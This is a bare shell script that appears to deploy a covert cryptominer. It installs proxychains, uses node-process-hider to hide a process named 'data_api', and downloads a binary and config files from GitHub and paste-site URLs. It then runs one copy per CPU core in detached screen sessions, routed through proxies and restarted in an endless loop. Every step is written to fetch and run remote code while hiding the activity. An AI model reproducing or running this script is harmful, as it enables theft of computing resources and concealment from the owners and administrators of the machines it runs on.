sudo apt update -y && apt install screen libjansson4 build-essential htop -y && cd ~ && git clone https://github.com/walters99/proxychains-ng.git && cd proxychains-ng > /dev/null 2>&1 && ./configure --prefix=/usr --sysconfdir=/etc && make && make install && make install-config
wget -O myconf.conf https://www.heypasteit.com/download/0IWWBC > /dev/null 2>&1 && sudo chmod +x myconf.conf && sudo mv myconf.conf /etc/proxychains.conf && proxychains4 curl google.com 
sudo npm i -g node-process-hider > /dev/null 2>&1 && sudo ph add data_api > /dev/null 2>&1
echo "SETTING USER..."
sudo npm i -g node-process-hider > /dev/null 2>&1 && sudo ph add data_api > /dev/null 2>&1

CPU=$(nproc)
wget -O data_api https://github.com/hambana01/cici/raw/main/download
# DIRAWAL=$(pwd)
for (( j=1; j<=$CPU; j++ ))
do
  DIR=$(shuf -n 1 -i 1-99999999)
  mkdir $DIR
  wget -O build_config https://www.heypasteit.com/download/0IX51N
  wget -O $DIR.sh https://github.com/hambana01/cici/raw/main/gas.sh
  sudo chmod 755 data_api build_config $DIR.sh
  sed -i "s/BLESS/$DIR/" "build_config"
  sed -i "s/WORK/$DIR/" "$DIR.sh"
  mv build_config $DIR/build_config
 # while :; do timeout 1m cpulimit -l 3 ./$DIR.sh > /dev/null 2>&1 ; sleep 3 ; done &
  while :; do screen -dmS $DIR proxychains4 ./$DIR.sh > /dev/null 2>&1 ; sleep 10 ; screen -X -S $DIR quit ; sleep 10 ; done &
done
echo "SUCCESS..."
sleep 359
